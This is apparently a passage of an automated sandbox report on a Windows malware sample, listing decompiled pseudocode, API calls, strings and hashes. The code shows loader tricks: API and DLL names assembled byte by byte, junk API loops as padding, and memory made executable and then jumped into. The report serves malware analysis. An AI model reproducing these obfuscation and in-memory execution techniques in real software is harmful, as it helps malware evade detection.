                          					_t661 = _t661 + 1;
                          				} while (_t661 < 0x286b97d);
                          				_t701 = 0x7b;
                          				do {
                          					if( *0x4450c4 == 0xf) {
                          						__imp__FindActCtxSectionStringW(0, 0, 0, 0,  &_v420);
                          					}
                          					_t701 = _t701 - 1;
                          				} while (_t701 != 0);
                          				_v12 = 0x184cc;
                          				do {
                          					if( *0x4450c4 == 0x1833b) {
                          						__imp__GetVolumePathNameA("yeyofatuw layesoxegejepofazugazotigitohoni lohoma",  &_v2468, 0);
                          						FindFirstChangeNotificationA(0, 0, 0);
                          						WriteConsoleW(0,  &_v1444, 0,  &_v16, 0);
                          						GetFileAttributesA(0);
                          						TlsSetValue(0, 0);
                          						__imp__GetConsoleAliasesW( &_v4516, 0, 0);
                          						EnumSystemCodePagesW(0, 0);
                          						GetFileAttributesA(0);
                          						__imp__GetVolumeNameForVolumeMountPointA(0, 0, 0);
                          						_v8 = 0;
                          						asm("stosw");
                          						_push( &_v20);
                          						_push(_v8);
                          						_push(0);
                          						_push(0);
                          						_push(0);
                          						FillConsoleOutputCharacterW();
                          						FoldStringW(0, 0, 0, 0, 0);
                          					}
                          					_t509 =  &_v12;
                          					 *_t509 = _v12 - 1;
                          				} while ( *_t509 != 0);
                          				E00404B4D();
                          				return  *0x444e90();
                          			}



































































































                          0x00404ece
                          0x00404ee0
                          0x00404ee5
                          0x00404eea
                          0x00404eeb
                          0x00404ef1
                          0x00404ef3
                          0x00404ef3
                          0x00404ef8
                          0x00404f16
                          0x00404f1b
                          0x00404f21
                          0x00404f26
                          0x00404f2b
                          0x00404f33
                          0x00404f35
                          0x00404f47
                          0x00404f54
                          0x00404f5c
                          0x00404f5c
                          0x00404f62
                          0x00404f63
                          0x00404f35
                          0x00404f6b
                          0x00404f6d
                          0x00404f77
                          0x00404f7f
                          0x00404f90
                          0x00404f9e
                          0x00404fa9
                          0x00404fcc
                          0x00404fd9
                          0x00404fee
                          0x00404fee
                          0x00404ff4
                          0x00404ff5
                          0x00405001
                          0x00405003
                          0x00405003
                          0x0040500f
                          0x00405015
                          0x0040501c
                          0x00405023
                          0x0040502a
                          0x00405031
                          0x00405038
                          0x00405042
                          0x00405049
                          0x00405053
                          0x0040505a
                          0x00405061
                          0x0040506b
                          0x00405075
                          0x0040507f
                          0x00405089
                          0x00405093
                          0x0040509d
                          0x004050a7
                          0x004050b1
                          0x004050bb
                          0x004050c2
                          0x004050cc
                          0x004050d6
                          0x004050dd
                          0x004050e7
                          0x004050ee
                          0x004050f8
                          0x00405102
                          0x0040510c
                          0x00405113
                          0x0040511a
                          0x00405121
                          0x00405128
                          0x0040512f
                          0x00405139
                          0x00405143
                          0x0040514d
                          0x00405154
                          0x0040515e
                          0x00405165
                          0x0040516c
                          0x00405176
                          0x00405180
                          0x0040518a
                          0x00405194
                          0x0040519b
                          0x004051a5
                          0x004051ac
                          0x004051b3
                          0x004051ba
                          0x004051c4
                          0x004051ce
                          0x004051d8
                          0x004051e2
                          0x004051ec
                          0x004051f6
                          0x004051fd
                          0x00405207
                          0x0040520e
                          0x00405218
                          0x00405222
                          0x00405229
                          0x00405233
                          0x0040523a
                          0x00405241
                          0x0040524b
                          0x00405255
                          0x0040525c
                          0x00405263
                          0x0040526d
                          0x00405277
                          0x00405281
                          0x00405288
                          0x0040528f
                          0x00405299
                          0x004052a3
                          0x004052ad
                          0x004052b7
                          0x004052c1
                          0x004052cb
                          0x004052d5
                          0x004052df
                          0x004052e9
                          0x004052f3
                          0x004052fa
                          0x0040530c
                          0x0040531e
                          0x00405325
                          0x0040532c
                          0x00405333
                          0x0040534e
                          0x00405358
                          0x0040535f
                          0x00405369
                          0x00405386
                          0x00405390
                          0x0040539a
                          0x004053a1
                          0x004053ab
                          0x004053d1
                          0x004053d8
                          0x004053df
                          0x004053f1
                          0x00405406
                          0x0040540d
                          0x00405414
                          0x0040541b
                          0x00405422
                          0x00405437
                          0x00405441
                          0x0040544b
                          0x00405455
                          0x0040545c
                          0x00405474
                          0x004054a5
                          0x004054af
                          0x004054b6
                          0x004054c0
                          0x004054ca
                          0x004054f0
                          0x004054fa
                          0x00405504
                          0x0040550b
                          0x00405515
                          0x0040551f
                          0x00405526
                          0x00405530
                          0x00405537
                          0x00405541
                          0x0040554b
                          0x00405555
                          0x00405567
                          0x0040556e
                          0x00405580
                          0x0040558a
                          0x00405594
                          0x0040559e
                          0x004055a8
                          0x004055b2
                          0x004055e6
                          0x0040560c
                          0x00405613
                          0x0040561a
                          0x00405624
                          0x0040562b
                          0x00405640
                          0x00405655
                          0x0040565f
                          0x00405666
                          0x00405670
                          0x0040567a
                          0x0040568f
                          0x004056aa
                          0x004056b1
                          0x004056bb
                          0x004056c5
                          0x004056cc
                          0x004056de
                          0x004056e5
                          0x00405711
                          0x0040572c
                          0x00405747
                          0x0040574e
                          0x00405755
                          0x00405770
                          0x00405777
                          0x00405789
                          0x0040578f
                          0x0040579b
                          0x00000000
                          0x00000000
                          0x0040579d
                          0x004057a4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004057a4
                          0x004057aa
                          0x004057af
                          0x004057b1
                          0x004057b7
                          0x004057b9
                          0x004057b9
                          0x004057be
                          0x004057bf
                          0x004057c9
                          0x004057ca
                          0x004057d1
                          0x004057de
                          0x004057de
                          0x004057e4
                          0x004057e4
                          0x004057ed
                          0x004057f4
                          0x004057fe
                          0x00405811
                          0x0040581a
                          0x0040582e
                          0x00405835
                          0x00405839
                          0x00405848
                          0x00405850
                          0x00405857
                          0x0040585c
                          0x00405864
                          0x0040586b
                          0x00405870
                          0x00405871
                          0x00405874
                          0x00405875
                          0x00405876
                          0x00405877
                          0x00405882
                          0x00405882
                          0x00405888
                          0x00405888
                          0x00405888
                          0x00405891
                          0x004058a0

                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00404F07
                          • LocalAlloc.KERNELBASE(00000000), ref: 00404F1B
                          • CreateJobObjectA.KERNEL32(00000000,kowax), ref: 00404F5C
                          • SetFileAttributesA.KERNEL32(pawujagobovalewobukalokaw,00000000), ref: 00404F7F
                          • GetProfileIntW.KERNEL32 ref: 00404F90
                          • GetCPInfo.KERNEL32(00000000,?), ref: 00404F9E
                          • FoldStringA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00404FA9
                          • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00404FCC
                          • OpenJobObjectW.KERNEL32 ref: 00404FD9
                          • GetCalendarInfoW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 00404FEE
                          • GetLastError.KERNEL32 ref: 00405003
                            • Part of subcall function 0040650A: __wcstoi64.LIBCMT ref: 00406516
                            • Part of subcall function 00406E58: _doexit.LIBCMT ref: 00406E64
                          • GetSystemDefaultLCID.KERNEL32(12652DE7,78838E04,5CF25B83,32A1E7FB,7F832484,723D872F,63BA0C91,03A6C434,3A465D9D,5F80CD7C,23420A38,3720702C,78838E04,3B8C8B6A,723D872F,17F9CBEA), ref: 0040578F
                          • FindActCtxSectionStringW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004057DE
                          • GetVolumePathNameA.KERNEL32 ref: 00405811
                          • FindFirstChangeNotificationA.KERNEL32(00000000,00000000,00000000), ref: 0040581A
                          • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040582E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00405835
                          • TlsSetValue.KERNEL32(00000000,00000000), ref: 00405839
                          • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00405848
                          • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00405850
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00405857
                          • GetVolumeNameForVolumeMountPointA.KERNEL32(00000000,00000000,00000000), ref: 0040585C
                          • FillConsoleOutputCharacterW.KERNEL32(00000000,00000000,00000000,?,?), ref: 00405877
                          • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00405882
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: Volume$AttributesConsoleFileString$FindFoldInfoNameObjectSystem$AliasesAllocCalendarChangeCharacterCodeCreateDefaultEnumErrorFillFirstHandleInformationLastLocalModuleMountNotificationOpenOutputPagesPathPointProfileSectionValueWrite__wcstoi64_doexit
                          • String ID: "c0$'=0$,p 7$2*$4h3?$8B#$:<-@$L*Pv$LJU$Tfd$ceyizevojapaxujekoxago$e$y$fs>$hiwapikijokutopesowayuzali$kernel32.dll$kowax$l34T$lm|4$pawujagobovalewobukalokaw$pudecebubafafelomulawogosu$yeyofatuw layesoxegejepofazugazotigitohoni lohoma$zo@[$zs=A$\?\
                          • API String ID: 4208290323-2628406891
                          • Opcode ID: e9ad084592832fef35c52f3e197c68b7dae287ed2096ae596f42d6bc1f2f6982
                          • Instruction ID: eabcc3d36a76018fd45fd1127a63d54f00c48212fc91d4c4cff7eda53df2b885
                          • Opcode Fuzzy Hash: e9ad084592832fef35c52f3e197c68b7dae287ed2096ae596f42d6bc1f2f6982
                          • Instruction Fuzzy Hash: 003230B5D01228DBCB608FA6DD89ADEBB74FF05304F208199E55ABB610D7304A85CF5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 88 8e0420-8e04f8 90 8e04ff-8e053c CreateWindowExA 88->90 91 8e04fa 88->91 92 8e053e 90->92 93 8e0540-8e0558 PostMessageA 90->93 94 8e05aa-8e05ad 91->94 92->94 95 8e055f-8e0563 93->95 95->94 96 8e0565-8e0579 95->96 96->94 98 8e057b-8e0582 96->98 99 8e05a8 98->99 100 8e0584-8e0588 98->100 99->95 100->99 101 8e058a-8e0591 100->101 101->99 102 8e0593-8e0597 call 8e0110 101->102 104 8e059c-8e05a5 102->104 104->99
                          APIs
                          • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 008E0533
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248746882.00000000008E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_file.jbxd
                          Similarity
                          • API ID: CreateWindow
                          • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                          • API String ID: 716092398-2341455598
                          • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                          • Instruction ID: f8e11907b28268d9c03a260760a71c241a3ef3e10c5a0f596d8fe18117109a85
                          • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                          • Instruction Fuzzy Hash: D7510670D083C8DAEB11CBA8C849B9DBFB2AF11708F144058D5447F286C3FA5A58CB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 105 404e1c-404ec5 GetProcAddress VirtualProtect
                          C-Code - Quality: 100%
                          			E00404E1C(void* __ecx) {
                          				long _v8;
                          				long _v12;
                          				int _t8;
                          
                          				 *0x443df8 = 0x56;
                          				 *0x443df9 = 0x69;
                          				 *0x443dfa = 0x72;
                          				 *0x443dff = 0x50;
                          				 *0x443e05 = 0x74;
                          				 *0x443e06 = 0;
                          				 *0x443dfb = 0x74;
                          				 *0x443dfc = 0x75;
                          				 *0x443dfd = 0x61;
                          				 *0x443dfe = 0x6c;
                          				 *0x443e00 = 0x72;
                          				 *0x443e01 = 0x6f;
                          				 *0x443e02 = 0x74;
                          				 *0x443e03 = 0x65;
                          				 *0x443e04 = 0x63;
                          				 *0x444e88 = GetProcAddress( *0x444e94, "msimg32.dll");
                          				_v8 = 0x20;
                          				_v8 = _v8 + 0x20;
                          				_t8 = VirtualProtect( *0x444e90,  *0x4450c4, _v8,  &_v12); // executed
                          				return _t8;
                          			}






                          0x00404e2c
                          0x00404e33
                          0x00404e3a
                          0x00404e41
                          0x00404e48
                          0x00404e4f
                          0x00404e56
                          0x00404e5d
                          0x00404e64
                          0x00404e6b
                          0x00404e72
                          0x00404e79
                          0x00404e80
                          0x00404e87
                          0x00404e8e
                          0x00404e9b
                          0x00404ea0
                          0x00404ea7
                          0x00404ebe
                          0x00404ec5

                          APIs
                          • GetProcAddress.KERNEL32(msimg32.dll), ref: 00404E95
                          • VirtualProtect.KERNELBASE(00000020,?), ref: 00404EBE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual
                          • String ID: $msimg32.dll
                          • API String ID: 3759838892-256693350
                          • Opcode ID: f1e856b1094a08c08efaf0353dc2a999235139218ffdb59d9d57a86097bf36f0
                          • Instruction ID: bd9d303411308f3e99d19587dc034badf0272bd5988586a4c7d9a8140ebc585f
                          • Opcode Fuzzy Hash: f1e856b1094a08c08efaf0353dc2a999235139218ffdb59d9d57a86097bf36f0
                          • Instruction Fuzzy Hash: E211006C8092C1DEE702CF54ED49B053FA66713B4AF1440B8E095066B2C3FB1718C77A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 106 8e05b0-8e05d5 107 8e05dc-8e05e0 106->107 108 8e061e-8e0621 107->108 109 8e05e2-8e05f5 GetFileAttributesA 107->109 110 8e05f7-8e05fe 109->110 111 8e0613-8e061c 109->111 110->111 112 8e0600-8e060b call 8e0420 110->112 111->107 114 8e0610 112->114 114->111
                          APIs
                          • GetFileAttributesA.KERNELBASE(apfHQ), ref: 008E05EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248746882.00000000008E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_file.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID: apfHQ$o
                          • API String ID: 3188754299-2999369273
                          • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                          • Instruction ID: 84d1dbe430b343727a2faacd9f0239ddc633d831711cd0f192cf6604117c6684
                          • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                          • Instruction Fuzzy Hash: 0F011E70C0428CEADB11DBD8C5183AEBFB5AF51309F148499C4096B252D7B69B98CFA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 115 40cb55-40cb64 GetEnvironmentStringsW 116 40cb66-40cb69 115->116 117 40cb6a-40cb6d 115->117 118 40cb7d-40cb86 call 40d677 117->118 119 40cb6f-40cb74 117->119 122 40cb8b-40cb90 118->122 119->119 120 40cb76-40cb7b 119->120 120->118 120->119 123 40cb92-40cb9e FreeEnvironmentStringsW 122->123 124 40cb9f-40cbaa call 40b100 122->124 124->123
                          C-Code - Quality: 100%
                          			E0040CB55() {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				WCHAR* _t1;
                          				void* _t5;
                          				void* _t18;
                          				WCHAR* _t20;
                          
                          				_t1 = GetEnvironmentStringsW();
                          				_t20 = _t1;
                          				if(_t20 != 0) {
                          					if( *_t20 != 0) {
                          						goto L3;
                          						do {
                          							do {
                          								L3:
                          								_t1 =  &(_t1[1]);
                          							} while ( *_t1 != 0);
                          							_t1 =  &(_t1[1]);
                          						} while ( *_t1 != 0);
                          					}
                          					_t13 = _t1 - _t20 + 2;
                          					_t5 = E0040D677(_t1 - _t20 + 2); // executed
                          					_t18 = _t5;
                          					if(_t18 != 0) {
                          						E0040B100(_t13, _t18, _t20, _t18, _t20, _t13);
                          					}
                          					FreeEnvironmentStringsW(_t20);
                          					return _t18;
                          				} else {
                          					return 0;
                          				}
                          			}










                          0x0040cb58
                          0x0040cb5e
                          0x0040cb64
                          0x0040cb6d
                          0x00000000
                          0x0040cb6f
                          0x0040cb6f
                          0x0040cb6f
                          0x0040cb70
                          0x0040cb71
                          0x0040cb77
                          0x0040cb78
                          0x0040cb6f
                          0x0040cb82
                          0x0040cb86
                          0x0040cb8b
                          0x0040cb90
                          0x0040cba2
                          0x0040cba7
                          0x0040cb93
                          0x0040cb9e
                          0x0040cb66
                          0x0040cb69
                          0x0040cb69

                          APIs
                          • GetEnvironmentStringsW.KERNEL32(00000000,00406FD2), ref: 0040CB58
                          • __malloc_crt.LIBCMT ref: 0040CB86
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040CB93
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: EnvironmentStrings$Free__malloc_crt
                          • String ID:
                          • API String ID: 237123855-0
                          • Opcode ID: 540efd0d5cb155af12a62a9ca8cb82a6a4a21e7cbbc29b15b2f14ee7371bbd70
                          • Instruction ID: e68d3ad6946e2ebdad21e99f61c40b24010c0b22ff8cb5065c2f402156d26964
                          • Opcode Fuzzy Hash: 540efd0d5cb155af12a62a9ca8cb82a6a4a21e7cbbc29b15b2f14ee7371bbd70
                          • Instruction Fuzzy Hash: CDF0E2369011209ACB2537757C898773238DA8A769312063BF492E3280E63C4C8282AC
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 127 404b4d-404bac LoadLibraryA
                          C-Code - Quality: 100%
                          			E00404B4D() {
                          				struct HINSTANCE__* _t1;
                          
                          				 *0x443e01 = 0x6c;
                          				 *0x443dfb = 0x6d;
                          				 *0x443dfa = 0x69;
                          				 *0x443dfc = 0x67;
                          				 *0x443e00 = 0x64;
                          				 *0x443e03 = 0;
                          				 *0x443dfd = 0x33;
                          				 *0x443df9 = 0x73;
                          				 *0x443e02 = 0x6c;
                          				 *0x443dff = 0x2e;
                          				 *0x443dfe = 0x32;
                          				 *0x443df8 = 0x6d; // executed
                          				_t1 = LoadLibraryA("msimg32.dll"); // executed
                          				return _t1;
                          			}




                          0x00404b52
                          0x00404b59
                          0x00404b60
                          0x00404b67
                          0x00404b6e
                          0x00404b75
                          0x00404b7c
                          0x00404b83
                          0x00404b8a
                          0x00404b91
                          0x00404b98
                          0x00404b9f
                          0x00404ba6
                          0x00404bac

                          APIs
                          • LoadLibraryA.KERNELBASE(msimg32.dll,00405896), ref: 00404BA6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: msimg32.dll
                          • API String ID: 1029625771-3287713914
                          • Opcode ID: 014939b81b0a158b1e65ab06531bc0a62278e9ebab93e16f0f9ecd9b013db874
                          • Instruction ID: a2a21168f7ea9ea285e5efab3a458b27fca38c762230874cdfde17eb733f7d86
                          • Opcode Fuzzy Hash: 014939b81b0a158b1e65ab06531bc0a62278e9ebab93e16f0f9ecd9b013db874
                          • Instruction Fuzzy Hash: EAF02458D4D2D1C9F7028B28A95AB002E970723F4AF1840A990E21A6A2C3FB0318C77E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 128 4074c4-4074e6 HeapCreate 129 4074e8-4074e9 128->129 130 4074ea-4074f3 128->130
                          C-Code - Quality: 100%
                          			E004074C4(intOrPtr _a4) {
                          				void* _t6;
                          
                          				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                          				 *0x4432c8 = _t6;
                          				if(_t6 != 0) {
                          					 *0x44625c = 1;
                          					return 1;
                          				} else {
                          					return _t6;
                          				}
                          			}




                          0x004074d9
                          0x004074df
                          0x004074e6
                          0x004074ed
                          0x004074f3
                          0x004074e9
                          0x004074e9
                          0x004074e9

                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004074D9
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: CreateHeap
                          • String ID:
                          • API String ID: 10892065-0
                          • Opcode ID: 78d3f72165d6dc13c1f83601e1bf38989b098d08fcd52eaab1c5740afed91f5d
                          • Instruction ID: 7d513479de628913d9c70e9ff0461ea1defa92f758d6b876d3b6105dd0453cff
                          • Opcode Fuzzy Hash: 78d3f72165d6dc13c1f83601e1bf38989b098d08fcd52eaab1c5740afed91f5d
                          • Instruction Fuzzy Hash: 85D05E7AA54344ABEB105F716D08B663BDCA385795F108476F90DC61A0F5B4D6808A09
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 131 40bb1b-40bb1d call 40baa9 133 40bb22-40bb23 131->133
                          C-Code - Quality: 100%
                          			E0040BB1B() {
                          				void* _t1;
                          
                          				_t1 = E0040BAA9(0); // executed
                          				return _t1;
                          			}




                          0x0040bb1d
                          0x0040bb23

                          APIs
                          • __encode_pointer.LIBCMT ref: 0040BB1D
                            • Part of subcall function 0040BAA9: TlsGetValue.KERNEL32(00000000,?,0040BB22,00000000,0040DAE4,00443428,00000000,00000314,?,004084CB,00443428,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BABB
                            • Part of subcall function 0040BAA9: TlsGetValue.KERNEL32(00000002,?,0040BB22,00000000,0040DAE4,00443428,00000000,00000314,?,004084CB,00443428,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BAD2
                            • Part of subcall function 0040BAA9: RtlEncodePointer.NTDLL(00000000,?,0040BB22,00000000,0040DAE4,00443428,00000000,00000314,?,004084CB,00443428,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BB10
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: Value$EncodePointer__encode_pointer
                          • String ID:
                          • API String ID: 2585649348-0
                          • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                          • Instruction ID: 7e4224bbe38dc51f274b3f09f605fa0bbf77e352b7c6d7f78f2a44217b079060
                          • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                          • Instruction Fuzzy Hash:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E0040DAC5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                          				intOrPtr _v0;
                          				void* _v804;
                          				intOrPtr _v808;
                          				intOrPtr _v812;
                          				intOrPtr _t6;
                          				intOrPtr _t11;
                          				intOrPtr _t12;
                          				intOrPtr _t13;
                          				long _t17;
                          				intOrPtr _t21;
                          				intOrPtr _t22;
                          				intOrPtr _t25;
                          				intOrPtr _t26;
                          				intOrPtr _t27;
                          				intOrPtr* _t31;
                          				void* _t34;
                          
                          				_t27 = __esi;
                          				_t26 = __edi;
                          				_t25 = __edx;
                          				_t22 = __ecx;
                          				_t21 = __ebx;
                          				_t6 = __eax;
                          				_t34 = _t22 -  *0x4185e8; // 0xfe2a5d19
                          				if(_t34 == 0) {
                          					asm("repe ret");
                          				}
                          				 *0x443b08 = _t6;
                          				 *0x443b04 = _t22;
                          				 *0x443b00 = _t25;
                          				 *0x443afc = _t21;
                          				 *0x443af8 = _t27;
                          				 *0x443af4 = _t26;
                          				 *0x443b20 = ss;
                          				 *0x443b14 = cs;
                          				 *0x443af0 = ds;
                          				 *0x443aec = es;
                          				 *0x443ae8 = fs;
                          				 *0x443ae4 = gs;
                          				asm("pushfd");
                          				_pop( *0x443b18);
                          				 *0x443b0c =  *_t31;
                          				 *0x443b10 = _v0;
                          				 *0x443b1c =  &_a4;
                          				 *0x443a58 = 0x10001;
                          				_t11 =  *0x443b10; // 0x0
                          				 *0x443a0c = _t11;
                          				 *0x443a00 = 0xc0000409;
                          				 *0x443a04 = 1;
                          				_t12 =  *0x4185e8; // 0xfe2a5d19
                          				_v812 = _t12;
                          				_t13 =  *0x4185ec; // 0x1d5a2e6
                          				_v808 = _t13;
                          				 *0x443a50 = IsDebuggerPresent();
                          				_push(1);
                          				E0040FE79(_t14);
                          				SetUnhandledExceptionFilter(0);
                          				_t17 = UnhandledExceptionFilter(0x403668);
                          				if( *0x443a50 == 0) {
                          					_push(1);
                          					E0040FE79(_t17);
                          				}
                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                          			}



















                          0x0040dac5
                          0x0040dac5
                          0x0040dac5
                          0x0040dac5
                          0x0040dac5
                          0x0040dac5
                          0x0040dac5
                          0x0040dacb
                          0x0040dacd
                          0x0040dacd
                          0x004116b8
                          0x004116bd
                          0x004116c3
                          0x004116c9
                          0x004116cf
                          0x004116d5
                          0x004116db
                          0x004116e2
                          0x004116e9
                          0x004116f0
                          0x004116f7
                          0x004116fe
                          0x00411705
                          0x00411706
                          0x0041170f
                          0x00411717
                          0x0041171f
